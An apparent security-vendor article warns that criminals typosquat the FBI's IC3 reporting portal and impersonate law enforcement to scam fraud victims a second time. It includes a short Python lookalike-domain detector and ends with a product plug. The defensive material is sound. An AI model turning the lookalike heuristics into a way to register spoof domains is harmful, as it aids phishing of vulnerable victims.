“Members of the public could unknowingly visit spoofed websites while attempting to find FBI IC3’s website to submit an IC3 report.”

Criminals spoof legitimate sites like the IC3 portal using techniques including ‘typosquatting’. They’ll create web domains that look like the target, but have subtle differences in the URL. They’ll often misspell or add characters to a domain name, which can deceive users attempting to report cybercrime incidents.
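One way to turn that typosquatting description into a check, as an added example that is not from the FBI advisory or the article: classify a hostname against the legitimate ic3.gov domain by normalising it, comparing edit distance, and looking for the trusted name embedded in another domain. The helper names, the distance threshold and the sample hostnames are assumptions and constructed inputs.

```python
import unicodedata

TRUSTED = ("ic3.gov",)  # the legitimate reporting site named in the article

def _levenshtein(a: str, b: str) -> int:
    # Classic edit distance; small values mean a typo-style variant.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def _normalize(host: str) -> str:
    # NFKC folds fullwidth and other compatibility forms; lowercase; drop a
    # trailing dot. Mixed-script homoglyphs beyond NFKC are not handled here.
    return unicodedata.normalize("NFKC", host).lower().rstrip(".")

def classify_host(host: str, trusted=TRUSTED) -> str:
    """Return 'legitimate', 'lookalike' or 'unrelated' for one hostname."""
    h = _normalize(host)
    for t in trusted:
        if h == t or h.endswith("." + t):
            return "legitimate"
    # Assumption: the registrable domain is the last two labels. That holds for
    # .gov but not for suffixes like co.uk; use a public-suffix list there.
    registrable = ".".join(h.split(".")[-2:])
    squashed = "".join(ch for ch in h if ch.isalnum())
    for t in trusted:
        # Threshold of 2 is a triage setting; expect false positives on short names.
        if _levenshtein(registrable, t) <= 2:
            return "lookalike"  # one or two edits away: typo or swapped character
        if t.replace(".", "") in squashed:
            return "lookalike"  # trusted name embedded inside another domain
    return "unrelated"

# Constructed test hostnames, not real sites.
SAMPLE_HOSTS = ("www.ic3.gov", "1c3.gov", "ic3-gov.example", "ic3.gov.example", "example.org")

if __name__ == "__main__":
    for host in SAMPLE_HOSTS:
        print(f"{host:20} {classify_host(host)}")
```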

The IC3 is the primary hub for cybercrime reporting in the US, and its services are now in high demand. According to the 2024 IC3 Crime Report, victims filed 859,532 complaints with it last year, totalling $16.6 billion in losses (up a third from 2023).

Criminals recognize that victims seeking help are often vulnerable to secondary attacks. After all, they have already been caught out once and are likely at an emotional disadvantage. So the criminals often succeed in attracting those victims to fake portals like these, with a view to scamming them again. A distracted or distraught victim can often hand over their sensitive data for a second time, including names, addresses, phone numbers, email addresses, and banking information.

This threat follows a disturbing pattern of law enforcement impersonation lately. In April this year, the FBI reported that criminals were targeting victims via social media, emails, and phone calls. In some cases, scammers would use fake social media accounts to approach members of fraud victim groups, convincing them that their funds had been recovered.

Attackers often impersonate law enforcement directly. In March, the FBI Philadelphia Field Office reported that scammers were routinely spoofing authentic law enforcement and government agency phone numbers to extort money from victims. A 2023 NPR investigation revealed how criminals leverage caller ID spoofing and voice cloning technology to impersonate real US Marshals.

As far back as 2022, the FBI reported that people were impersonating its officials. In one particularly nasty scenario, people who had been duped by romance scammers, and who had become wise to the trick and cut off communications, would then be contacted by the organization behind the scam pretending to be a government official asking for help to catch romance scammers. Or the caller would tell the victim that their name had been linked to a crime and they needed to clear it.

If you do fall victim to this kind of fraud, it’s far from certain that you’ll get your money back. The IC3’s 2024 report documents the Recovery Asset Team’s efforts to combat fraud through the Financial Fraud Kill Chain, which achieved a 66% success rate freezing cash from fraudulent transactions. According to that report, the average victim of online crime lost almost $20,000.

How to protect yourself

The main thing to remember is that IC3 employees will never contact you directly via phone, email, or social media, and will never request payment for fund recovery. If someone recommends that you visit a site for fund recovery, take that recommendation with several swimming pools’ worth of salt.

If you suspect you’ve already been scammed, then quick reporting is key. Stop talking to the scammers immediately and get in touch with the IC3 now. Do that by typing the www.ic3.gov web address directly into your browser rather than relying on someone else’s link or a search result.

All online crime is nasty, but this portal scam is particularly horrid, because it often targets people who have already been hit once. As always, check in with your less-tech-savvy friends and relatives to ensure they haven’t fallen victim to something like this, especially if they’re older. One infuriating stat from the IC3 report is that the older the victim, the greater the loss.


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!